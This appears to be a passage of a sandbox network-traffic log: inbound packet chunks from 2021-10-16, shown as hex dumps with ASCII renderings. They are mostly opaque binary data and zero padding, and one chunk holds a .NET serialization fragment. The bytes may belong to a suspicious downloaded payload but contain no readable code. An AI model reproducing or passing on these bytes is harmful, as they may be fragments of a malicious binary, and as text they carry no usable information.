2021-10-16 14:53:40 UTC	5277	IN	Data Raw: de 19 cd 2f 11 1a 1e c6 0a b8 7a 2b d5 dc a2 93 ab 42 af 55 40 69 61 b3 8f 72 3f 4d bb 76 f1 5b dc e9 85 74 f9 39 bd c1 94 a3 9b cf b5 f2 bb f9 3e 9f 4d 80 82 a9 46 6b 30 17 da e8 4a a2 5c 78 27 f4 a2 ef da 93 d1 c6 20 5c 1c 27 4c 64 d4 a6 46 21 25 e5 03 cc 7a a9 e4 c3 13 fa 33 1b 55 9c 69 ca 3e 3c 80 a3 8a e6 ff da 7e f6 04 a8 48 8f 19 84 e8 a7 e0 9a cc e7 a1 50 83 a8 48 9d f8 a6 2c 61 d8 19 15 cd e8 ae 98 5f 45 8e 82 f3 3a 65 92 49 77 1e 70 f2 49 a3 11 ed 6a c2 5e 50 e3 1c 1f 09 63 50 c0 e3 e0 29 d9 e4 4e 3e 78 ee 97 8e 23 55 c7 1d 05 3e 55 30 60 59 9f fd 35 f1 d2 1f e2 0c 9f 6a 15 ec 15 62 da 33 d4 7f 03 a3 d8 9a 8a 9d a6 f7 7f 77 95 f5 33 98 b9 ff 72 f8 5b ff 73 85 9b 2e af c2 89 4a fd b2 1e a1 28 73 10 4a f3 b3 dc 82 a3 a0 de ca 16 d7 37 12 68 f7 39 Data Ascii: /z+BU@iar?Mv[t9>MFk0J\x' \'LdF!%z3Ui><~HPH,a_E:eIwpIj^PcP)N>x#U>U0`Y5jb3w3r[s.J(sJ7h9
2021-10-16 14:53:40 UTC	5293	IN	Data Raw: 09 03 d6 96 6d 0c 89 58 ab 60 0b ae e6 66 4f 58 20 16 0b 88 83 d9 50 fa 3d a7 68 49 bd df ae 24 7f b7 b7 6f 20 dd 67 78 7a e7 c5 08 24 4f ed 25 73 f5 17 68 d3 7e 35 83 80 88 2c fb da ae b4 21 9d 42 31 30 d1 12 a6 95 3d 92 33 57 6e 9f 40 21 7e d7 83 38 03 54 fc 70 a6 26 d5 6e 77 61 e6 94 a4 8f 2b 22 fd 05 6d b2 25 f3 19 4f 9b 57 54 7c 21 79 80 d5 a1 53 a1 d7 70 f7 17 10 a9 9b c0 79 db 8f 6e f3 10 db 1e ba 72 43 0a c0 3f 34 a3 a2 6a c5 4c 57 2c 11 1d da 7d da ba 13 29 73 8e d4 79 d5 54 42 db 88 80 fa dc 61 e0 b7 ff c3 c7 1c 0d 4e 07 43 c1 a5 04 73 80 c6 c1 84 25 c4 d4 45 73 c6 cc b8 eb a2 90 5b 12 71 4f ad 37 0b 96 7d 6f 91 ab 38 f4 e0 91 f9 14 29 d9 fe d0 c0 aa d7 2a e3 5a e6 4b 43 23 72 d3 2d 52 e7 ff 15 5f 7b 34 f2 8b e7 c5 8e 01 78 26 a5 a7 dc 25 ad 4f Data Ascii: mX`fOX P=hI$o gxz$O%sh~5,!B10=3Wn@!~8Tp&nwa+"m%OWT\|!ySpynrC?4jLW,})syTBaNCs%Es[qO7}o8)*ZKC#r-R_{4x&%O
2021-10-16 14:53:40 UTC	5309	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5325	IN	Data Raw: 40 4f 97 d3 ad cb a3 63 9c bf 83 6b 7d 00 b5 9c 6b c7 70 8d a7 6f 9f 37 b7 2d 96 e4 f1 e8 85 af b2 7a 4a 2d a3 fc 30 46 0a 49 29 ae 98 59 0a 54 6b a4 04 ce 4e 9e 0e 5e 29 ce 9c 9a dd 31 28 52 52 09 a4 a3 d3 18 c3 11 de a3 2e 00 f7 62 b5 1b 03 c3 eb da 78 21 41 91 5c d3 98 8e dd af 50 ab 6f 68 c2 f4 d6 a1 8a d0 db b6 21 00 49 e4 ef ce e7 63 b7 b5 96 e0 50 3e 7f 69 cf 78 0a 99 53 a7 c3 f6 93 22 77 60 6f 99 14 e4 0e fb 70 0c 2b 86 74 c5 d9 94 44 1a 2d 4d fd e2 7d 7a d2 b8 cf 16 d9 71 35 a6 bd 99 65 9f 1e d2 b7 e5 4c 14 a7 a6 8b e2 38 b2 d2 76 df 5d e0 b3 68 e0 dc 89 4f f9 33 af 32 42 8d 2d ab d0 d3 8d 18 d6 df 99 45 de bd 14 18 f1 81 71 5e 3c d8 2a 97 3e a5 f2 7f 9f a5 66 fe 9e 27 f0 c1 a6 86 56 0a d6 3c 3b 99 0f d9 95 f8 22 59 13 85 95 09 8f 69 ab 5a 86 d2 Data Ascii: @Ock}kpo7-zJ-0FI)YTkN^)1(RR.bx!A\Poh!IcP>ixS"w`op+tD-M}zq5eL8v]hO32B-Eq^<*>f'V<;"YiZ
2021-10-16 14:53:40 UTC	5341	IN	Data Raw: 35 82 03 58 1e 9d 05 87 1a c4 3e 5e 38 20 a8 32 90 a8 5e d0 eb ed 59 b7 9d 0d 8c 22 3e 3d d9 91 ac b7 1a 4d 27 6f e4 5e c4 c7 12 bc d7 23 3f 96 7b f9 5c b6 bc c4 62 7e 61 e4 f3 28 37 f3 11 a8 8a 58 73 c5 27 e2 f7 43 00 1d 1a 0d df af 11 60 46 fb e4 a7 d2 b3 57 6e 23 13 4d 1a 60 cd b3 f3 6d dd 26 02 63 b5 b4 f5 e3 e4 90 3b f9 e5 f6 93 a3 42 33 52 54 e5 a2 ca f3 0e cf a4 4e 54 c8 f8 55 3e 32 18 aa a1 72 e8 a7 bd 2a 77 11 f1 97 cb 04 b3 95 a3 08 0a 21 13 5b 6f e6 cc e5 6a 96 b4 6b 87 90 5e 63 dd 67 42 09 cb 2b 59 fb 32 3f 8f da 41 a3 50 45 25 a5 bb fd 53 71 ec da 5a 33 87 80 02 02 72 44 ca e1 08 0d f9 bb 7c fc 69 85 bc 60 dd 8b 59 ff ca 4d b9 07 76 c8 6a e7 01 8d 6c aa 7e 20 80 cb e3 49 cc f6 ec c4 28 08 59 19 0b 1c 44 4e bd 9e 82 41 d5 fa 05 ef 1e 5d 99 5a Data Ascii: 5X>^8 2^Y">=M'o^#?{\b~a(7Xs'C`FWn#M`m&c;B3RTNTU>2r*w![ojk^cgB+Y2?APE%SqZ3rD\|i`YMvjl~ I(YDNA]Z
2021-10-16 14:53:40 UTC	5357	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 d9 90 5c e8 a9 ae 40 80 1d f1 b5 d9 14 3a 8b 79 44 cf 32 02 6a fb 56 d4 eb 73 75 5b a8 31 b5 d8 08 5d 4f 5f f6 ef e5 2a e1 89 37 ac a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 4f 1a 78 6e 06 13 52 fa 2e 6e ba 21 49 1f da 26 60 1d ea f0 ec 92 0e 99 d8 4c dd 5e 2c eb f2 8d 15 1d 65 db d2 50 3a ee e6 de 90 c9 de f2 b9 28 f9 d6 5a 36 e1 de d6 c3 8c c4 51 3d 10 dd c4 16 f3 60 9e 69 89 a7 38 01 9b c6 f2 4a 49 df 2a 8c 6a 98 b5 d1 00 af 85 a7 Data Ascii: \@:yD2jVsu[1]O_7OxnR.n!I&`L^,eP:(Z6Q=`i8JIj
2021-10-16 14:53:40 UTC	5373	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5389	IN	Data Raw: 99 46 e8 f0 98 ce 62 6a ce f0 dc 08 74 a4 d9 ce 31 30 89 08 f8 be 2a 1b fb 84 7a 2f 0f 50 21 02 f2 1a 38 34 a7 ee f6 82 6b 1f 57 c3 65 d7 ca f3 c7 f5 ff 8b e1 93 0a 4a be ac aa 01 f6 fc 75 a1 c0 a4 5f 35 0d b8 35 11 2b 75 68 24 99 4a 73 82 ad d7 3b 84 bd 2b d3 73 aa 64 2c 91 99 f4 df 42 63 e5 ef 48 aa 2f f9 fb 34 7f 72 f3 e1 d0 0c 18 08 55 57 d0 18 0b 97 3f e8 f0 38 e3 d2 57 9b ef d5 a8 ea 61 93 ba 7e ef 7a 56 d7 2d 16 02 bb fa 26 d2 71 55 4e 31 4e 11 c9 bc 9a 59 1c 35 e5 b3 59 0e c6 1f af 9a 94 50 e8 ce 3d 80 1f 1f 01 45 66 be c7 8c 34 13 e4 a8 fa 5a f2 1d 2f 2e ba c1 48 eb f8 51 75 2a 92 31 61 d9 34 fc 78 c0 eb 7f c6 d3 d3 cf 63 e3 fb fd 3f b8 43 9a 32 4b 50 a8 f3 58 49 5e fd f5 80 e1 14 08 93 fb d1 da a1 71 a8 a6 3a 61 47 f5 e4 2a 35 d2 c2 81 88 b9 48 Data Ascii: Fbjt10z/P!84kWeJu_55+uh$Js;+sd,BcH/4rUW?8Wa~zV-&qUN1NY5YP=Ef4Z/.HQu1a4xc?C2KPXI^q:aG*5H
2021-10-16 14:53:40 UTC	5405	IN	Data Raw: 7d 8c 03 d5 93 93 cd ac 62 af 61 54 b9 ac cf 4b ab ff 10 29 69 d9 05 65 f5 d5 8d 2a 57 85 89 e9 e0 31 d9 0e bf dd ee 67 42 27 ad 27 6e 3f a6 cd 23 fe f9 5a ba aa 4e 08 30 35 da f4 83 78 1e f8 eb 9d ee 0c 73 16 8d 67 a0 81 77 6c ed 4d 86 e6 a0 21 eb a3 23 67 89 3a c2 b6 f6 ab cc e8 86 ba 98 5d 84 3a 3b d0 d1 83 c1 62 75 ca 6f 5e 50 aa db 65 ce 91 9f 33 90 17 eb 1f 57 85 77 0d 90 ab 3f fc 54 06 9a 23 30 4f 41 01 45 82 44 b7 d0 4d 99 36 b2 81 2d 42 5f 92 ed 0d 25 0b 6f 80 a4 1e 15 32 08 77 3d c5 10 84 5e d7 0e fb d2 6d 50 ef 4e 09 b6 82 92 a9 66 a0 44 49 b4 5b ae 8b c8 89 56 8f fa 04 ba 31 45 62 db 8a d7 3e 55 96 64 eb 3a f8 01 dc 74 1c f3 cf 34 3d 16 a6 05 a3 2f bc db 05 59 d5 e3 87 f0 c7 1a 4e ce 0a 74 3f dc 94 d5 b4 a3 83 a8 64 09 42 33 76 59 2a ff a2 36 Data Ascii: }baTK)ieW1gB''n?#ZN05xsgwlM!#g:]:;buo^Pe3Ww?T#0OAEDM6-B_%o2w=^mPNfDI[V1Eb>Ud:t4=/YNt?dB3vY6
2021-10-16 14:53:40 UTC	5421	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5437	IN	Data Raw: 3f f9 91 a2 29 89 3b 8a d8 ed a8 da 48 55 73 a3 c6 ad 61 ea 6b 9b 30 56 73 ef 09 1a 1f 3c 46 f6 14 55 92 d7 05 5e d1 58 6b 6f 96 c7 42 be 3d 3b 6c a9 70 cb 4e ee 75 3c 51 0b da d5 20 f6 8b c2 39 e3 c2 c1 51 10 1b d8 4b e5 91 fc 5a 86 b4 b1 e9 4d 86 c9 eb df b6 33 14 57 49 ab 06 a6 38 18 15 05 8a 06 95 2b 7d 23 7a 25 67 e3 82 d6 e6 ea 9c 86 00 ee 4d 9d d6 ac 07 99 48 1e c4 d6 52 dc 6f 5c ce 07 e9 c0 73 51 e7 fd 9a 58 c8 bd a6 fd 9d 09 49 fb 98 c6 0d c9 93 a5 a0 d0 fa 3e da f6 c8 ea 76 77 f1 4e bb 38 59 38 d4 c9 95 bc a0 95 7b 3d 24 2c 71 22 9f 06 33 66 a2 81 62 3a 08 2f 97 cc e2 cb 64 41 47 ca ec 96 03 8b e6 5a 30 c5 82 02 6d 96 03 1a 45 24 ca 9e 35 d2 1c e4 f2 3d 4d 89 0a 0a a5 db f8 cc b8 60 35 7b 65 43 f6 62 57 46 56 2e 07 34 f2 f1 0d af bf ac 37 7a e6 Data Ascii: ?);HUsak0Vs<FU^XkoB=;lpNu<Q 9QKZM3WI8+}#z%gMHRo\sQXI>vwN8Y8{=$,q"3fb:/dAGZ0mE$5=M`5{eCbWFV.47z
2021-10-16 14:53:40 UTC	5453	IN	Data Raw: 2c 1c 42 bf 2b 76 b0 c8 1f ec 3b 66 4c 31 5d 76 6e 25 ec 69 f6 bc f8 b6 4e 83 60 62 47 3b 99 0a 55 24 d8 5d 16 26 5c 5c 93 7c 2a 19 a1 54 9a 6b 32 53 c4 b4 4a f0 03 44 22 8e 4b 49 b2 d1 7f 5e 82 7e 93 53 54 be 8d 38 9f e0 5b d7 a7 81 bd 26 e3 5f a3 94 06 02 6a d3 fb 8d 28 7b 75 0a 8f bf 71 1a 30 f0 89 9f cf 14 c6 38 d8 a6 bc c4 05 2f c4 3b 1d 8f b0 7b 2f c5 0f 84 c2 7a dc 67 22 90 40 ae 60 7e 87 f0 39 b1 5e 18 25 2e 25 b5 76 d9 a5 35 19 e2 77 41 38 30 48 d2 27 22 25 7a f7 0c 4d a8 42 66 52 0a e3 6b 48 66 8a 5d cc 1c 1d 12 6e f8 4b 90 9c b2 d2 51 c6 93 d0 e0 fa d3 f2 25 bc 13 08 36 1a fc 3a 4f 1d eb e0 8a 3a 30 44 02 33 1a 78 23 ba a5 00 38 d2 3f 68 53 b3 b6 17 fe 1d 52 30 15 ac 73 b4 b0 23 a0 81 42 69 d4 f5 c3 e8 b5 4e 35 e2 59 92 ce af 24 81 90 2a 5a 2d Data Ascii: ,B+v;fL1]vn%iN`bG;U$]&\\\|Tk2SJD"KI^~ST8[&_j({uq08/;{/zg"@`~9^%.%v5wA80H'"%zMBfRkHf]nKQ%6:O:0D3x#8?hSR0s#BiN5Y$Z-
2021-10-16 14:53:40 UTC	5469	IN	Data Raw: 43 c3 c8 7f 32 91 1e 35 64 52 1d 28 64 ae b7 13 45 e0 9b bc d3 45 6b 8c 8a 09 1d 07 39 e0 d2 f4 02 bf 0f 28 11 05 ad f6 f6 d5 4e 8c 41 d1 9a 0d c9 cb 38 0b 3c 25 32 a0 d9 57 9a f5 ba 7d 11 b6 89 8e f0 71 29 30 16 50 4c 48 3c 02 b8 10 08 f3 c4 60 50 ed 0a 2e 6a e6 97 75 2e d2 9d 93 3e 1a 01 61 b0 68 84 5c 12 8b 3f 70 b5 82 ed 33 e7 d5 66 17 8a b2 f8 de aa b0 d0 89 9d 66 9d 9e 7a 49 d6 a1 b0 a2 07 8c 56 54 88 ac eb eb f5 e2 91 36 44 b0 6f f8 52 5b 66 ce 2b a5 2b 06 26 65 74 c2 23 b8 6a 0d 0d ab 5d c3 20 2a f5 ea ea b2 e0 ef ad b8 8f c3 38 d2 1f e8 27 32 fd 4e ce 18 9b 29 84 d3 13 8d 01 17 8a dd 7c da 97 6b f2 0e 7c 57 19 c3 9a e8 e6 67 3c d0 61 92 a7 d1 38 ca e7 8e 64 05 4d 74 05 65 43 22 bc d7 1d 8c 9b d6 02 90 43 ab 19 e0 b7 f3 d2 27 c9 43 f9 04 b9 e3 a2 Data Ascii: C25dR(dEEk9(NA8<%2W}q)0PLH<`P.ju.>ah\?p3ffzIVT6DoR[f++&et#j] *8'2N)\|k\|Wg<a8dMteC"C'C
2021-10-16 14:53:40 UTC	5485	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5501	IN	Data Raw: 56 18 bd ce be 36 6a 67 d5 12 da f2 a5 25 fb c6 1b 2f 40 9c 13 88 03 a8 1f 88 af d2 e8 5b 50 17 75 81 6a 4b f3 7d 77 f5 06 96 b8 77 90 1a dc 7c bc de 61 a5 7e 65 ba 6e 35 69 46 9e d6 6f f5 b5 5a 50 48 03 c3 fb 83 13 29 2d 71 df c8 54 e6 db 6b 61 45 a5 8a ea f1 d5 71 2a 04 4d 5c 5b f3 09 df 50 73 1d 8b ea ae de 3d cb 02 e5 a1 b6 b0 79 a3 db af 24 22 e8 1a c7 d0 50 55 a8 17 23 7f ea 6a a7 82 00 91 70 5a b7 5c 6a 3f a3 25 1d 59 ad 98 72 15 b3 a1 62 a3 59 70 4b 11 a9 37 18 80 53 d4 31 2f 0a ec 24 be 4b e8 ab 4d 11 63 61 c9 a6 dc ec 6c de b3 c3 f2 5d 92 81 70 b7 dc 12 c3 af 55 aa ef f9 31 54 98 0f f6 9a bb 8f 6c 8e f7 9f ac eb 8c e2 11 7f 09 35 36 3d 7b 02 20 28 b5 85 d3 fb 50 8c 38 46 15 42 0f a1 d8 d0 d6 97 a2 98 e2 1b 8e b3 ae 77 8d 7f ef cf c2 1c 72 5d 3f Data Ascii: V6jg%/@[PujK}ww\|a~en5iFoZPH)-qTkaEq*M\[Ps=y$"PU#jpZ\j?%YrbYpK7S1/$KMcal]pU1Tl56={ (P8FBwr]?
2021-10-16 14:53:40 UTC	5517	IN	Data Raw: 45 09 83 07 9e 2f f4 40 c2 b5 10 80 0d 5a 07 9c 99 6a 4c c3 6c 02 fc 80 3d 66 e4 57 43 c7 c9 e6 02 cf 69 85 67 aa 61 55 54 7a e7 f1 ff 46 e5 cc 17 ad 92 0e 29 18 53 28 b1 65 da 60 6b 61 21 65 48 e6 11 58 e3 57 df ca b3 4c 9f 3b c5 4d cf 52 16 9d d3 9e 0a f2 43 06 95 ec 44 6c 49 a3 24 89 13 20 01 4a f2 48 e0 d0 d4 ea 0c e9 87 05 94 24 93 40 23 54 2b b6 64 30 6a 2f 3d cc 7c e1 bc da f3 79 f0 f2 3c 72 2d cb e7 a6 36 27 aa f2 45 76 13 1e 86 5b f8 97 98 16 66 5b 97 65 1b 54 30 00 89 ca 27 88 1f 10 9d 04 f4 15 36 da 3a d0 5d fc 63 df 45 db 8a 66 0d 27 86 e6 e1 2f d2 90 f8 bf 4e 23 b7 a0 5c ae 87 66 83 53 33 42 47 9d cc 0d ec 61 9d 71 8e 36 15 5d 51 e9 eb 51 6b a9 60 d1 3c e3 10 dc da a1 20 74 d0 c3 ec 3b 65 f7 7a ab 93 49 74 2e 3b 77 c2 07 44 cd 66 7b 10 81 e2 Data Ascii: E/@ZjLl=fWCigaUTzF)S(e`ka!eHXWL;MRCDlI$ JH$@#T+d0j/=\|y<r-6'Ev[f[eT0'6:]cEf'/N#\fS3BGaq6]QQk`< t;ezIt.;wDf{
2021-10-16 14:53:40 UTC	5533	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5549	IN	Data Raw: 28 a7 5b c0 9d ee 77 fa d0 e0 56 88 3c eb c8 da 67 b9 3f bf b0 4e e6 60 ff 10 55 57 9a 37 73 6e d6 12 57 12 b4 96 12 da 1c 2d d1 d8 a7 21 dc a1 a7 da bc 7d ee 35 0d 0f 00 00 00 00 be 79 a0 bc 62 da ef 23 28 af 67 e2 9d b7 a9 90 bb dc 19 83 4e e1 0c 66 e7 07 1b 68 07 cb e6 32 75 0a 09 cb 79 19 53 7a 46 14 92 51 5d 77 61 be 5f f6 2d 04 f4 af bb 71 39 fc 30 62 52 d7 9e 3b c7 9e d8 88 6f 3e a3 77 81 37 54 95 e4 e5 ac 8d 80 77 9c e2 0a 0f 8a 39 f1 0c 69 3a 34 cf 23 fc 89 07 6f 20 af eb 15 68 17 02 fa ca 97 e0 bb 47 12 f2 72 45 47 96 b0 80 d6 cf 3b a2 d4 6b 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 Data Ascii: ([wV<g?N`UW7snW-!}5yb#(gNfh2uySzFQ]wa_-q90bR;o>w7Tw9i:4#o hGrEG;k@QSystem.Drawing, Version=4.0.0.0, Culture=neu
2021-10-16 14:53:40 UTC	5565	IN	Data Raw: 32 be 55 86 63 fb 1b bd 88 6f 84 59 2c 36 6d f5 6f dd c5 b5 49 c1 ec 9b 2e 57 2e 95 b6 4c dd 0e 20 11 5a 06 7b 45 84 bd 43 1e 44 9d 03 c8 28 aa 54 be 3e 40 d4 ad 74 f2 25 78 f1 42 7e 08 f1 dd 67 4f 9f 02 0a 48 34 3f 6a 81 92 e4 01 f6 d0 fc 48 7b f8 40 f4 95 4a 79 63 8f eb 0d 5e 14 1f 78 a8 77 56 7a 8f e6 54 e3 d9 ba 5b 25 92 b5 a7 99 17 c3 40 e6 55 d9 52 82 82 ba 40 78 f3 40 9c 7a bf 60 36 4c 8c b6 a9 b7 06 70 54 9c fb ad fd ba 97 18 45 c1 f3 6a 70 3d 89 cd 4c 1a 47 8e da ad 44 65 1a 77 5a 54 0d 03 f9 b1 47 49 23 59 c4 9b 5d ee 51 93 3c 94 3d 69 3c 97 73 01 a4 74 9a 2a 6c 2e 77 9e d4 cd e8 c8 a8 28 48 f2 74 d3 52 d2 5e 5d 85 94 f0 e9 77 fb 45 8d c9 48 4a 0d 91 1b 31 08 63 ea ba 7b e9 47 f6 fb 21 34 01 cb 5b 29 dc d5 c3 e1 73 3a a5 48 e7 e2 c5 16 52 91 47 Data Ascii: 2UcoY,6moI.W.L Z{ECD(T>@t%xB~gOH4?jH{@Jyc^xwVzT[%@UR@x@z`6LpTEjp=LGDewZTGI#Y]Q<=i<st*l.w(HtR^]wEHJ1c{G!4[)s:HRG
2021-10-16 14:53:40 UTC	5581	IN	Data Raw: 1d 68 2a b5 38 54 bd 66 e4 e2 cd 64 40 34 02 d4 c4 d3 a1 4e ab 17 cd 71 ad a5 2d af 0a f2 64 2c 4f ab 3c 97 a5 69 9d 81 13 6b 0b e3 18 73 55 3b 6d 4d e7 98 0d 28 a1 cd dd 37 e1 a9 fd 2b e9 fe b2 a9 30 a9 af a3 fc 3c 56 92 f9 c8 8a 73 a5 8c cc b1 d0 db 1d f0 01 0c 21 cb 3d 3f cb 8e 4d 20 2e ce 95 c4 90 c6 e9 6c 35 2b 15 23 d1 5a 94 b2 c8 c5 f6 2e c1 75 17 71 6e 5d e4 f7 8f 52 af 03 1c 07 48 0e a8 67 f5 1f 89 4e 45 8f 53 7a c6 96 ff 9b e0 0f 42 99 f4 9e 93 13 3f 38 3f 77 6d f8 6e 7a 91 f0 ef 3a c3 90 40 e5 b6 8a a8 23 e3 c6 75 3f 8e 0e 46 8c bd 45 4f f5 51 ae d4 44 11 ac 74 8d 59 f6 31 02 cf de 3b 1f a9 c0 bb 17 68 8d 8f 2d 16 21 b6 31 8c 8e e7 c0 6b a0 52 11 85 72 58 23 6c b1 21 d6 22 2c fa a7 5a 9b 65 bc 0c 1b e8 7e 84 97 0b fb c1 36 0f 05 2b 1a 07 01 55 Data Ascii: h*8Tfd@4Nq-d,O<iksU;mM(7+0<Vs!=?M .l5+#Z.uqn]RHgNESzB?8?wmnz:@#u?FEOQDtY1;h-!1kRrX#l!",Ze~6+U
2021-10-16 14:53:40 UTC	5597	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
